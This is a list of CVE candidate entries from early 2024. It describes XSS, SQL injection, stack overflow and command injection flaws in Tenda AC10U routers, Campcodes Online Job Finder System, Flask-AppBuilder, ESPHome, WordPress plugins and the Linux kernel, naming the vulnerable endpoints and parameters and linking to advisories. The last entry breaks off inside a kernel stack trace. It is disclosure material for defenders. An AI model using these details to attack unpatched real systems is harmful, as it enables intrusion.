CVE 2024 27083 Candidate Flask-AppBuilder is an application development framework, built on top of Flask. A Cross-Site Scripting (XSS) vulnerability has been discovered on the OAuth login page. An attacker could trick a user to follow a specially crafted URL to the OAuth login page. This URL could inject and execute malicious javascript code that would get executed on the user's browser. This issue was introduced on 4.1.4 and patched on 4.2.1. MISC:https://github.com/dpgaspar/Flask-AppBuilder/commit/3d17741886e4b3c384d0570de69689e4117aa812 | URL:https://github.com/dpgaspar/Flask-AppBuilder/commit/3d17741886e4b3c384d0570de69689e4117aa812 | MISC:https://github.com/dpgaspar/Flask-AppBuilder/security/advisories/GHSA-fqxj-46wg-9v84 | URL:https://github.com/dpgaspar/Flask-AppBuilder/security/advisories/GHSA-fqxj-46wg-9v84 Assigned (20240219)
CVE 2024 27081 Candidate ESPHome is a system to control your ESP8266/ESP32. A security misconfiguration in the edit configuration file API in the dashboard component of ESPHome version 2023.12.9 (command line installation) allows authenticated remote attackers to read and write arbitrary files under the configuration directory rendering remote code execution possible. This vulnerability is patched in 2024.2.1. MISC:https://github.com/esphome/esphome/commit/d814ed1d4adc71fde47c4df41215bee449884513 | URL:https://github.com/esphome/esphome/commit/d814ed1d4adc71fde47c4df41215bee449884513 | MISC:https://github.com/esphome/esphome/security/advisories/GHSA-8p25-3q46-8q2p | URL:https://github.com/esphome/esphome/security/advisories/GHSA-8p25-3q46-8q2p Assigned (20240219)
CVE 2024 2708 Candidate A vulnerability was found in Tenda AC10U 15.03.06.49 and classified as critical. This issue affects the function formexeCommand of the file /goform/execCommand. The manipulation of the argument cmdinput leads to stack-based buffer overflow. The attack may be initiated remotely. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-257459. NOTE: The vendor was contacted early about this disclosure but did not respond in any way. MISC:VDB-257459 | CTI Indicators (IOB, IOC, IOA) | URL:https://vuldb.com/?ctiid.257459 | MISC:VDB-257459 | Tenda AC10U execCommand formexeCommand stack-based overflow | URL:https://vuldb.com/?id.257459 | MISC:https://github.com/abcdefg-png/IoT-vulnerable/blob/main/Tenda/AC10U/v1.V15.03.06.49/more/formexeCommand.md | URL:https://github.com/abcdefg-png/IoT-vulnerable/blob/main/Tenda/AC10U/v1.V15.03.06.49/more/formexeCommand.md Assigned (20240320)
CVE 2024 2707 Candidate A vulnerability has been found in Tenda AC10U 15.03.06.49 and classified as critical. This vulnerability affects the function formWriteFacMac of the file /goform/WriteFacMac. The manipulation of the argument mac leads to os command injection. The attack can be initiated remotely. The exploit has been disclosed to the public and may be used. VDB-257458 is the identifier assigned to this vulnerability. NOTE: The vendor was contacted early about this disclosure but did not respond in any way. MISC:VDB-257458 | CTI Indicators (IOB, IOC, TTP, IOA) | URL:https://vuldb.com/?ctiid.257458 | MISC:VDB-257458 | Tenda AC10U WriteFacMac formWriteFacMac os command injection | URL:https://vuldb.com/?id.257458 | MISC:https://github.com/abcdefg-png/IoT-vulnerable/blob/main/Tenda/AC10U/v1.V15.03.06.49/more/formWriteFacMac.md | URL:https://github.com/abcdefg-png/IoT-vulnerable/blob/main/Tenda/AC10U/v1.V15.03.06.49/more/formWriteFacMac.md Assigned (20240320)
CVE 2024 2706 Candidate A vulnerability, which was classified as critical, was found in Tenda AC10U 15.03.06.49. This affects the function formWifiWpsStart of the file /goform/WifiWpsStart. The manipulation of the argument index leads to stack-based buffer overflow. It is possible to initiate the attack remotely. The exploit has been disclosed to the public and may be used. The identifier VDB-257457 was assigned to this vulnerability. NOTE: The vendor was contacted early about this disclosure but did not respond in any way. MISC:VDB-257457 | CTI Indicators (IOB, IOC, IOA) | URL:https://vuldb.com/?ctiid.257457 | MISC:VDB-257457 | Tenda AC10U WifiWpsStart formWifiWpsStart stack-based overflow | URL:https://vuldb.com/?id.257457 | MISC:https://github.com/abcdefg-png/IoT-vulnerable/blob/main/Tenda/AC10U/v1.V15.03.06.49/more/formWifiWpsStart.md | URL:https://github.com/abcdefg-png/IoT-vulnerable/blob/main/Tenda/AC10U/v1.V15.03.06.49/more/formWifiWpsStart.md Assigned (20240320)
CVE 2024 2705 Candidate A vulnerability, which was classified as critical, has been found in Tenda AC10U 1.0/15.03.06.49. Affected by this issue is the function formSetQosBand of the file /goform/SetNetControlList. The manipulation of the argument list leads to stack-based buffer overflow. The attack may be launched remotely. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-257456. NOTE: The vendor was contacted early about this disclosure but did not respond in any way. MISC:VDB-257456 | CTI Indicators (IOB, IOC, IOA) | URL:https://vuldb.com/?ctiid.257456 | MISC:VDB-257456 | Tenda AC10U SetNetControlList formSetQosBand stack-based overflow | URL:https://vuldb.com/?id.257456 | MISC:https://github.com/abcdefg-png/IoT-vulnerable/blob/main/Tenda/AC10U/v1.V15.03.06.49/more/formSetQosBand.md | URL:https://github.com/abcdefg-png/IoT-vulnerable/blob/main/Tenda/AC10U/v1.V15.03.06.49/more/formSetQosBand.md Assigned (20240320)
CVE 2024 2704 Candidate A vulnerability classified as critical was found in Tenda AC10U 15.03.06.49. Affected by this vulnerability is the function formSetFirewallCfg of the file /goform/SetFirewallCfg. The manipulation of the argument firewallEn leads to stack-based buffer overflow. The attack can be launched remotely. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-257455. NOTE: The vendor was contacted early about this disclosure but did not respond in any way. MISC:VDB-257455 | CTI Indicators (IOB, IOC, IOA) | URL:https://vuldb.com/?ctiid.257455 | MISC:VDB-257455 | Tenda AC10U SetFirewallCfg formSetFirewallCfg stack-based overflow | URL:https://vuldb.com/?id.257455 | MISC:https://github.com/abcdefg-png/IoT-vulnerable/blob/main/Tenda/AC10U/v1.V15.03.06.49/more/formSetFirewallCfg.md | URL:https://github.com/abcdefg-png/IoT-vulnerable/blob/main/Tenda/AC10U/v1.V15.03.06.49/more/formSetFirewallCfg.md Assigned (20240320)
CVE 2024 2703 Candidate A vulnerability classified as critical has been found in Tenda AC10U 15.03.06.49. Affected is the function formSetDeviceName of the file /goform/SetOnlineDevName. The manipulation of the argument mac leads to stack-based buffer overflow. It is possible to launch the attack remotely. The exploit has been disclosed to the public and may be used. VDB-257454 is the identifier assigned to this vulnerability. NOTE: The vendor was contacted early about this disclosure but did not respond in any way. MISC:VDB-257454 | CTI Indicators (IOB, IOC, IOA) | URL:https://vuldb.com/?ctiid.257454 | MISC:VDB-257454 | Tenda AC10U SetOnlineDevName formSetDeviceName stack-based overflow | URL:https://vuldb.com/?id.257454 | MISC:https://github.com/abcdefg-png/IoT-vulnerable/blob/main/Tenda/AC10U/v1.V15.03.06.49/more/formSetDeviceName_mac.md | URL:https://github.com/abcdefg-png/IoT-vulnerable/blob/main/Tenda/AC10U/v1.V15.03.06.49/more/formSetDeviceName_mac.md Assigned (20240320)
CVE 2024 2702 Candidate Missing Authorization vulnerability in Olive Themes Olive One Click Demo Import allows importing settings and data, ultimately leading to XSS.This issue affects Olive One Click Demo Import: from n/a through 1.1.1. MISC:https://patchstack.com/database/vulnerability/olive-one-click-demo-import/wordpress-olive-one-click-demo-import-plugin-1-1-1-broken-access-control-vulnerability?_s_id=cve | URL:https://patchstack.com/database/vulnerability/olive-one-click-demo-import/wordpress-olive-one-click-demo-import-plugin-1-1-1-broken-access-control-vulnerability?_s_id=cve Assigned (20240320)
CVE 2024 2690 Candidate A vulnerability was found in SourceCodester Online Discussion Forum Site 1.0. It has been classified as critical. Affected is an unknown function of the file /uupdate.php. The manipulation of the argument ima leads to unrestricted upload. It is possible to launch the attack remotely. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-257388. MISC:VDB-257388 | CTI Indicators (IOB, IOC, TTP, IOA) | URL:https://vuldb.com/?ctiid.257388 | MISC:VDB-257388 | SourceCodester Online Discussion Forum Site uupdate.php unrestricted upload | URL:https://vuldb.com/?id.257388 | MISC:https://github.com/wkeyi0x1/vul-report/issues/2 | URL:https://github.com/wkeyi0x1/vul-report/issues/2 Assigned (20240319)
CVE 2024 2688 Candidate The EmbedPress – Embed PDF, Google Docs, Vimeo, Wistia, Embed YouTube Videos, Audios, Maps & Embed Any Documents in Gutenberg & Elementor plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the EmbedPress document widget in all versions up to, and including, 3.9.12 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. MISC:https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&old=3055856%40embedpress&new=3055856%40embedpress&sfp_email=&sfph_mail= | URL:https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&old=3055856%40embedpress&new=3055856%40embedpress&sfp_email=&sfph_mail= | MISC:https://www.wordfence.com/threat-intel/vulnerabilities/id/c5b67927-5993-4e21-af52-8ebe7fee48ab?source=cve | URL:https://www.wordfence.com/threat-intel/vulnerabilities/id/c5b67927-5993-4e21-af52-8ebe7fee48ab?source=cve Assigned (20240319)
CVE 2024 2687 Candidate A vulnerability was found in Campcodes Online Job Finder System 1.0 and classified as critical. This issue affects some unknown processing of the file /admin/applicants/index.php. The manipulation of the argument id leads to sql injection. The attack may be initiated remotely. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-257387. MISC:VDB-257387 | CTI Indicators (IOB, IOC, TTP, IOA) | URL:https://vuldb.com/?ctiid.257387 | MISC:VDB-257387 | Campcodes Online Job Finder System index.php sql injection | URL:https://vuldb.com/?id.257387 | MISC:https://github.com/E1CHO/cve_hub/blob/main/Online%20Job%20Finder%20System/Online%20Job%20Finder%20System%20-%20vuln%2011.pdf | URL:https://github.com/E1CHO/cve_hub/blob/main/Online%20Job%20Finder%20System/Online%20Job%20Finder%20System%20-%20vuln%2011.pdf Assigned (20240319)
CVE 2024 2686 Candidate A vulnerability has been found in Campcodes Online Job Finder System 1.0 and classified as problematic. This vulnerability affects unknown code of the file /admin/applicants/controller.php. The manipulation of the argument JOBREGID leads to cross site scripting. The attack can be initiated remotely. The exploit has been disclosed to the public and may be used. VDB-257386 is the identifier assigned to this vulnerability. MISC:VDB-257386 | CTI Indicators (IOB, IOC, TTP, IOA) | URL:https://vuldb.com/?ctiid.257386 | MISC:VDB-257386 | Campcodes Online Job Finder System controller.php cross site scripting | URL:https://vuldb.com/?id.257386 | MISC:https://github.com/E1CHO/cve_hub/blob/main/Online%20Job%20Finder%20System/Online%20Job%20Finder%20System%20-%20vuln%2021.pdf | URL:https://github.com/E1CHO/cve_hub/blob/main/Online%20Job%20Finder%20System/Online%20Job%20Finder%20System%20-%20vuln%2021.pdf Assigned (20240319)
CVE 2024 2685 Candidate A vulnerability, which was classified as problematic, was found in Campcodes Online Job Finder System 1.0. This affects an unknown part of the file /admin/applicants/index.php. The manipulation of the argument view leads to cross site scripting. It is possible to initiate the attack remotely. The exploit has been disclosed to the public and may be used. The identifier VDB-257385 was assigned to this vulnerability. MISC:VDB-257385 | CTI Indicators (IOB, IOC, TTP, IOA) | URL:https://vuldb.com/?ctiid.257385 | MISC:VDB-257385 | Campcodes Online Job Finder System index.php cross site scripting | URL:https://vuldb.com/?id.257385 | MISC:https://github.com/E1CHO/cve_hub/blob/main/Online%20Job%20Finder%20System/Online%20Job%20Finder%20System%20-%20vuln%2020.pdf | URL:https://github.com/E1CHO/cve_hub/blob/main/Online%20Job%20Finder%20System/Online%20Job%20Finder%20System%20-%20vuln%2020.pdf Assigned (20240319)
CVE 2024 2684 Candidate A vulnerability, which was classified as problematic, has been found in Campcodes Online Job Finder System 1.0. Affected by this issue is some unknown functionality of the file /admin/category/index.php. The manipulation of the argument view leads to cross site scripting. The attack may be launched remotely. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-257384. MISC:VDB-257384 | CTI Indicators (IOB, IOC, TTP, IOA) | URL:https://vuldb.com/?ctiid.257384 | MISC:VDB-257384 | Campcodes Online Job Finder System index.php cross site scripting | URL:https://vuldb.com/?id.257384 | MISC:https://github.com/E1CHO/cve_hub/blob/main/Online%20Job%20Finder%20System/Online%20Job%20Finder%20System%20-%20vuln%209.pdf | URL:https://github.com/E1CHO/cve_hub/blob/main/Online%20Job%20Finder%20System/Online%20Job%20Finder%20System%20-%20vuln%209.pdf Assigned (20240319)
CVE 2024 2683 Candidate A vulnerability classified as problematic was found in Campcodes Online Job Finder System 1.0. Affected by this vulnerability is an unknown functionality of the file /admin/company/index.php. The manipulation of the argument view leads to cross site scripting. The attack can be launched remotely. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-257383. MISC:VDB-257383 | CTI Indicators (IOB, IOC, TTP, IOA) | URL:https://vuldb.com/?ctiid.257383 | MISC:VDB-257383 | Campcodes Online Job Finder System index.php cross site scripting | URL:https://vuldb.com/?id.257383 | MISC:https://github.com/E1CHO/cve_hub/blob/main/Online%20Job%20Finder%20System/Online%20Job%20Finder%20System%20-%20vuln%2018.pdf | URL:https://github.com/E1CHO/cve_hub/blob/main/Online%20Job%20Finder%20System/Online%20Job%20Finder%20System%20-%20vuln%2018.pdf Assigned (20240319)
CVE 2024 2682 Candidate A vulnerability classified as problematic has been found in Campcodes Online Job Finder System 1.0. Affected is an unknown function of the file /admin/employee/controller.php. The manipulation of the argument EMPLOYEEID leads to cross site scripting. It is possible to launch the attack remotely. The exploit has been disclosed to the public and may be used. VDB-257382 is the identifier assigned to this vulnerability. MISC:VDB-257382 | CTI Indicators (IOB, IOC, TTP, IOA) | URL:https://vuldb.com/?ctiid.257382 | MISC:VDB-257382 | Campcodes Online Job Finder System controller.php cross site scripting | URL:https://vuldb.com/?id.257382 | MISC:https://github.com/E1CHO/cve_hub/blob/main/Online%20Job%20Finder%20System/Online%20Job%20Finder%20System%20-%20vuln%2017.pdf | URL:https://github.com/E1CHO/cve_hub/blob/main/Online%20Job%20Finder%20System/Online%20Job%20Finder%20System%20-%20vuln%2017.pdf Assigned (20240319)
CVE 2024 2681 Candidate A vulnerability was found in Campcodes Online Job Finder System 1.0. It has been rated as problematic. This issue affects some unknown processing of the file /admin/employee/index.php. The manipulation of the argument view leads to cross site scripting. The attack may be initiated remotely. The exploit has been disclosed to the public and may be used. The identifier VDB-257381 was assigned to this vulnerability. MISC:VDB-257381 | CTI Indicators (IOB, IOC, TTP, IOA) | URL:https://vuldb.com/?ctiid.257381 | MISC:VDB-257381 | Campcodes Online Job Finder System index.php cross site scripting | URL:https://vuldb.com/?id.257381 | MISC:https://github.com/E1CHO/cve_hub/blob/main/Online%20Job%20Finder%20System/Online%20Job%20Finder%20System%20-%20vuln%2016.pdf | URL:https://github.com/E1CHO/cve_hub/blob/main/Online%20Job%20Finder%20System/Online%20Job%20Finder%20System%20-%20vuln%2016.pdf Assigned (20240319)
CVE 2024 2680 Candidate A vulnerability was found in Campcodes Online Job Finder System 1.0. It has been declared as problematic. This vulnerability affects unknown code of the file /admin/user/index.php. The manipulation of the argument view leads to cross site scripting. The attack can be initiated remotely. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-257380. MISC:VDB-257380 | CTI Indicators (IOB, IOC, TTP, IOA) | URL:https://vuldb.com/?ctiid.257380 | MISC:VDB-257380 | Campcodes Online Job Finder System index.php cross site scripting | URL:https://vuldb.com/?id.257380 | MISC:https://github.com/E1CHO/cve_hub/blob/main/Online%20Job%20Finder%20System/Online%20Job%20Finder%20System%20-%20vuln%2015.pdf | URL:https://github.com/E1CHO/cve_hub/blob/main/Online%20Job%20Finder%20System/Online%20Job%20Finder%20System%20-%20vuln%2015.pdf Assigned (20240319)
CVE 2024 2679 Candidate A vulnerability was found in Campcodes Online Job Finder System 1.0. It has been classified as problematic. This affects an unknown part of the file /admin/vacancy/index.php. The manipulation of the argument view leads to cross site scripting. It is possible to initiate the attack remotely. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-257379. MISC:VDB-257379 | CTI Indicators (IOB, IOC, TTP, IOA) | URL:https://vuldb.com/?ctiid.257379 | MISC:VDB-257379 | Campcodes Online Job Finder System index.php cross site scripting | URL:https://vuldb.com/?id.257379 | MISC:https://github.com/E1CHO/cve_hub/blob/main/Online%20Job%20Finder%20System/Online%20Job%20Finder%20System%20-%20vuln%2014.pdf | URL:https://github.com/E1CHO/cve_hub/blob/main/Online%20Job%20Finder%20System/Online%20Job%20Finder%20System%20-%20vuln%2014.pdf Assigned (20240319)
CVE 2024 2678 Candidate A vulnerability was found in Campcodes Online Job Finder System 1.0 and classified as critical. Affected by this issue is some unknown functionality of the file /admin/applicants/controller.php. The manipulation of the argument JOBREGID leads to sql injection. The attack may be launched remotely. The exploit has been disclosed to the public and may be used. VDB-257378 is the identifier assigned to this vulnerability. MISC:VDB-257378 | CTI Indicators (IOB, IOC, TTP, IOA) | URL:https://vuldb.com/?ctiid.257378 | MISC:VDB-257378 | Campcodes Online Job Finder System controller.php sql injection | URL:https://vuldb.com/?id.257378 | MISC:https://github.com/E1CHO/cve_hub/blob/main/Online%20Job%20Finder%20System/Online%20Job%20Finder%20System%20-%20vuln%2013.pdf | URL:https://github.com/E1CHO/cve_hub/blob/main/Online%20Job%20Finder%20System/Online%20Job%20Finder%20System%20-%20vuln%2013.pdf Assigned (20240319)
CVE 2024 2677 Candidate A vulnerability has been found in Campcodes Online Job Finder System 1.0 and classified as critical. Affected by this vulnerability is an unknown functionality of the file /admin/category/controller.php. The manipulation of the argument CATEGORYID leads to sql injection. The attack can be launched remotely. The exploit has been disclosed to the public and may be used. The identifier VDB-257377 was assigned to this vulnerability. MISC:VDB-257377 | CTI Indicators (IOB, IOC, TTP, IOA) | URL:https://vuldb.com/?ctiid.257377 | MISC:VDB-257377 | Campcodes Online Job Finder System controller.php sql injection | URL:https://vuldb.com/?id.257377 | MISC:https://github.com/E1CHO/cve_hub/blob/main/Online%20Job%20Finder%20System/Online%20Job%20Finder%20System%20-%20vuln%2012.pdf | URL:https://github.com/E1CHO/cve_hub/blob/main/Online%20Job%20Finder%20System/Online%20Job%20Finder%20System%20-%20vuln%2012.pdf Assigned (20240319)
CVE 2024 2676 Candidate A vulnerability, which was classified as critical, was found in Campcodes Online Job Finder System 1.0. Affected is an unknown function of the file /admin/company/controller.php. The manipulation of the argument id leads to sql injection. It is possible to launch the attack remotely. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-257376. MISC:VDB-257376 | CTI Indicators (IOB, IOC, TTP, IOA) | URL:https://vuldb.com/?ctiid.257376 | MISC:VDB-257376 | Campcodes Online Job Finder System controller.php sql injection | URL:https://vuldb.com/?id.257376 | MISC:https://github.com/E1CHO/cve_hub/blob/main/Online%20Job%20Finder%20System/Online%20Job%20Finder%20System%20-%20vuln%209.pdf | URL:https://github.com/E1CHO/cve_hub/blob/main/Online%20Job%20Finder%20System/Online%20Job%20Finder%20System%20-%20vuln%209.pdf Assigned (20240319)
CVE 2024 2675 Candidate A vulnerability, which was classified as critical, has been found in Campcodes Online Job Finder System 1.0. This issue affects some unknown processing of the file /admin/company/index.php. The manipulation of the argument id leads to sql injection. The attack may be initiated remotely. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-257375. MISC:VDB-257375 | CTI Indicators (IOB, IOC, TTP, IOA) | URL:https://vuldb.com/?ctiid.257375 | MISC:VDB-257375 | Campcodes Online Job Finder System index.php sql injection | URL:https://vuldb.com/?id.257375 | MISC:https://github.com/E1CHO/cve_hub/blob/main/Online%20Job%20Finder%20System/Online%20Job%20Finder%20System%20-%20vuln%208.pdf | URL:https://github.com/E1CHO/cve_hub/blob/main/Online%20Job%20Finder%20System/Online%20Job%20Finder%20System%20-%20vuln%208.pdf Assigned (20240319)
CVE 2024 2674 Candidate A vulnerability classified as critical was found in Campcodes Online Job Finder System 1.0. This vulnerability affects unknown code of the file /admin/employee/index.php. The manipulation of the argument id leads to sql injection. The attack can be initiated remotely. The exploit has been disclosed to the public and may be used. VDB-257374 is the identifier assigned to this vulnerability. MISC:VDB-257374 | CTI Indicators (IOB, IOC, TTP, IOA) | URL:https://vuldb.com/?ctiid.257374 | MISC:VDB-257374 | Campcodes Online Job Finder System index.php sql injection | URL:https://vuldb.com/?id.257374 | MISC:https://github.com/E1CHO/cve_hub/blob/main/Online%20Job%20Finder%20System/Online%20Job%20Finder%20System%20-%20vuln%207.pdf | URL:https://github.com/E1CHO/cve_hub/blob/main/Online%20Job%20Finder%20System/Online%20Job%20Finder%20System%20-%20vuln%207.pdf Assigned (20240319)
CVE 2024 2673 Candidate A vulnerability classified as critical has been found in Campcodes Online Job Finder System 1.0. This affects an unknown part of the file /admin/login.php. The manipulation of the argument user_email leads to sql injection. It is possible to initiate the attack remotely. The exploit has been disclosed to the public and may be used. The identifier VDB-257373 was assigned to this vulnerability. MISC:VDB-257373 | CTI Indicators (IOB, IOC, TTP, IOA) | URL:https://vuldb.com/?ctiid.257373 | MISC:VDB-257373 | Campcodes Online Job Finder System login.php sql injection | URL:https://vuldb.com/?id.257373 | MISC:https://github.com/E1CHO/cve_hub/blob/main/Online%20Job%20Finder%20System/Online%20Job%20Finder%20System%20-%20vuln%206.pdf | URL:https://github.com/E1CHO/cve_hub/blob/main/Online%20Job%20Finder%20System/Online%20Job%20Finder%20System%20-%20vuln%206.pdf Assigned (20240319)
CVE 2024 2672 Candidate A vulnerability was found in Campcodes Online Job Finder System 1.0. It has been rated as critical. Affected by this issue is some unknown functionality of the file /admin/user/controller.php. The manipulation of the argument UESRID leads to sql injection. The attack may be launched remotely. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-257372. MISC:VDB-257372 | CTI Indicators (IOB, IOC, TTP, IOA) | URL:https://vuldb.com/?ctiid.257372 | MISC:VDB-257372 | Campcodes Online Job Finder System controller.php sql injection | URL:https://vuldb.com/?id.257372 | MISC:https://github.com/E1CHO/cve_hub/blob/main/Online%20Job%20Finder%20System/Online%20Job%20Finder%20System%20-%20vuln%205.pdf | URL:https://github.com/E1CHO/cve_hub/blob/main/Online%20Job%20Finder%20System/Online%20Job%20Finder%20System%20-%20vuln%205.pdf Assigned (20240319)
CVE 2024 2671 Candidate A vulnerability was found in Campcodes Online Job Finder System 1.0. It has been declared as critical. Affected by this vulnerability is an unknown functionality of the file /admin/user/index.php. The manipulation of the argument id leads to sql injection. The attack can be launched remotely. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-257371. MISC:VDB-257371 | CTI Indicators (IOB, IOC, TTP, IOA) | URL:https://vuldb.com/?ctiid.257371 | MISC:VDB-257371 | Campcodes Online Job Finder System index.php sql injection | URL:https://vuldb.com/?id.257371 | MISC:https://github.com/E1CHO/cve_hub/blob/main/Online%20Job%20Finder%20System/Online%20Job%20Finder%20System%20-%20vuln%204.pdf | URL:https://github.com/E1CHO/cve_hub/blob/main/Online%20Job%20Finder%20System/Online%20Job%20Finder%20System%20-%20vuln%204.pdf Assigned (20240319)
CVE 2024 2670 Candidate A vulnerability was found in Campcodes Online Job Finder System 1.0. It has been classified as critical. Affected is an unknown function of the file /admin/vacancy/index.php. The manipulation of the argument id leads to sql injection. It is possible to launch the attack remotely. The exploit has been disclosed to the public and may be used. VDB-257370 is the identifier assigned to this vulnerability. MISC:VDB-257370 | CTI Indicators (IOB, IOC, TTP, IOA) | URL:https://vuldb.com/?ctiid.257370 | MISC:VDB-257370 | Campcodes Online Job Finder System index.php sql injection | URL:https://vuldb.com/?id.257370 | MISC:https://github.com/E1CHO/cve_hub/blob/main/Online%20Job%20Finder%20System/Online%20Job%20Finder%20System%20-%20vuln%203.pdf | URL:https://github.com/E1CHO/cve_hub/blob/main/Online%20Job%20Finder%20System/Online%20Job%20Finder%20System%20-%20vuln%203.pdf Assigned (20240319)
CVE 2024 2669 Candidate A vulnerability was found in Campcodes Online Job Finder System 1.0 and classified as critical. This issue affects some unknown processing of the file /admin/employee/controller.php of the component GET Parameter Handler. The manipulation of the argument EMPLOYEEID leads to sql injection. The attack may be initiated remotely. The exploit has been disclosed to the public and may be used. The identifier VDB-257369 was assigned to this vulnerability. MISC:VDB-257369 | CTI Indicators (IOB, IOC, TTP, IOA) | URL:https://vuldb.com/?ctiid.257369 | MISC:VDB-257369 | Campcodes Online Job Finder System GET Parameter controller.php sql injection | URL:https://vuldb.com/?id.257369 | MISC:https://github.com/E1CHO/cve_hub/blob/main/Online%20Job%20Finder%20System/Online%20Job%20Finder%20System%20-%20vuln%202.pdf | URL:https://github.com/E1CHO/cve_hub/blob/main/Online%20Job%20Finder%20System/Online%20Job%20Finder%20System%20-%20vuln%202.pdf Assigned (20240319)
CVE 2024 2668 Candidate A vulnerability has been found in Campcodes Online Job Finder System 1.0 and classified as critical. This vulnerability affects unknown code of the file /admin/vacancy/controller.php. The manipulation of the argument id/CATEGORY leads to sql injection. The attack can be initiated remotely. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-257368. MISC:VDB-257368 | CTI Indicators (IOB, IOC, TTP, IOA) | URL:https://vuldb.com/?ctiid.257368 | MISC:VDB-257368 | Campcodes Online Job Finder System controller.php sql injection | URL:https://vuldb.com/?id.257368 | MISC:https://github.com/E1CHO/cve_hub/blob/main/Online%20Job%20Finder%20System/Online%20Job%20Finder%20System%20-%20vuln%2010.pdf | URL:https://github.com/E1CHO/cve_hub/blob/main/Online%20Job%20Finder%20System/Online%20Job%20Finder%20System%20-%20vuln%2010.pdf Assigned (20240319)
CVE 2024 26643 Candidate In the Linux kernel, the following vulnerability has been resolved: netfilter: nf_tables: mark set as dead when unbinding anonymous set with timeout While the rhashtable set gc runs asynchronously, a race allows it to collect elements from anonymous sets with timeouts while it is being released from the commit path. Mingi Cho originally reported this issue in a different path in 6.1.x with a pipapo set with low timeouts which is not possible upstream since 7395dfacfff6 ("netfilter: nf_tables: use timestamp to check for set element timeout"). Fix this by setting on the dead flag for anonymous sets to skip async gc in this case. According to 08e4c8c5919f ("netfilter: nf_tables: mark newset as dead on transaction abort"), Florian plans to accelerate abort path by releasing objects via workqueue, therefore, this sets on the dead flag for abort path too. MISC:https://git.kernel.org/stable/c/552705a3650bbf46a22b1adedc1b04181490fc36 | URL:https://git.kernel.org/stable/c/552705a3650bbf46a22b1adedc1b04181490fc36 Assigned (20240219)
CVE 2024 26642 Candidate In the Linux kernel, the following vulnerability has been resolved: netfilter: nf_tables: disallow anonymous set with timeout flag Anonymous sets are never used with timeout from userspace, reject this. Exception to this rule is NFT_SET_EVAL to ensure legacy meters still work. MISC:https://git.kernel.org/stable/c/16603605b667b70da974bea8216c93e7db043bf1 | URL:https://git.kernel.org/stable/c/16603605b667b70da974bea8216c93e7db043bf1 Assigned (20240219)
CVE 2024 26641 Candidate In the Linux kernel, the following vulnerability has been resolved: ip6_tunnel: make sure to pull inner header in __ip6_tnl_rcv() syzbot found __ip6_tnl_rcv() could access unitiliazed data [1]. Call pskb_inet_may_pull() to fix this, and initialize ipv6h variable after this call as it can change skb->head. [1] BUG: KMSAN: uninit-value in __INET_ECN_decapsulate include/net/inet_ecn.h:253 [inline] BUG: KMSAN: uninit-value in INET_ECN_decapsulate include/net/inet_ecn.h:275 [inline] BUG: KMSAN: uninit-value in IP6_ECN_decapsulate+0x7df/0x1e50 include/net/inet_ecn.h:321 __INET_ECN_decapsulate include/net/inet_ecn.h:253 [inline] INET_ECN_decapsulate include/net/inet_ecn.h:275 [inline] IP6_ECN_decapsulate+0x7df/0x1e50 include/net/inet_ecn.h:321 ip6ip6_dscp_ecn_decapsulate+0x178/0x1b0 net/ipv6/ip6_tunnel.c:727 __ip6_tnl_rcv+0xd4e/0x1590 net/ipv6/ip6_tunnel.c:845 ip6_tnl_rcv+0xce/0x100 net/ipv6/ip6_tunnel.c:888 gre_rcv+0x143f/0x1870 ip6_protocol_deliver_rcu+0xda6/0x2a60 net/ipv6/ip6_input.c:438 ip6_input_finish net/ipv6/ip6_input.c:483 [inline] NF_HOOK include/linux/netfilter.h:314 [inline] ip6_input+0x15d/0x430 net/ipv6/ip6_input.c:492 ip6_mc_input+0xa7e/0xc80 net/ipv6/ip6_input.c:586 dst_input include/net/dst.h:461 [inline] ip6_rcv_finish+0x5db/0x870 net/ipv6/ip6_input.c:79 NF_HOOK include/linux/netfilter.h:314 [inline] ipv6_rcv+0xda/0x390 net/ipv6/ip6_input.c:310 __netif_receive_skb_one_core net/core/dev.c:5532 [inline] __netif_receive_skb+0x1a6/0x5a0 net/core/dev.c:5646 netif_receive_skb_internal net/core/dev.c:5732 [inline] netif_receive_skb+0x58/0x660 net/core/dev.c:5791 tun_rx_batched+0x3ee/0x980 drivers/net/tun.c:1555 tun_get_user+0x53af/0x66d0 drivers/net/tun.c:2002 tun_chr_write_iter+0x3af/0x5d0 drivers/net/tun.c:2048 call_write_iter include/linux/fs.h:2084 [inline] new_sync_write fs/read_write.c:497 [inline] vfs_write+0x786/0x1200 fs/read_write.c:590 ksys_write+0x20f/0x4c0 fs/read_write.c:643 __do_sys_write fs/read_write.c:655 [inline] __se_sys_write fs/read_write.c:652 [inline] __x64_sys_write+0x93/0xd0 fs/read_write.c:652 do_syscall_x64 arch/x86/entry/common.c:52 [inline] do_syscall_64+0x6d/0x140 arch/x86/entry/common.c:83 entry_SYSCALL_64_after_hwframe+0x63/0x6b Uninit was created at: slab_post_alloc_hook+0x129/0xa70 mm/slab.h:768 slab_alloc_node mm/slub.c:3478 [inline] kmem_cache_alloc_node+0x5e9/0xb10 mm/slub.c:3523 kmalloc_reserve+0x13d/0x4a0 net/core/skbuff.c:560 __alloc_skb+0x318/0x740 net/core/skbuff.c:651 alloc_skb include/linux/skbuff.h:1286 [inline] alloc_skb_with_frags+0xc8/0xbd0 net/core/skbuff.c:6334 sock_alloc_send_pskb+0xa80/0xbf0 net/core/sock.c:2787 tun_alloc_skb drivers/net/tun.c:1531 [inline] 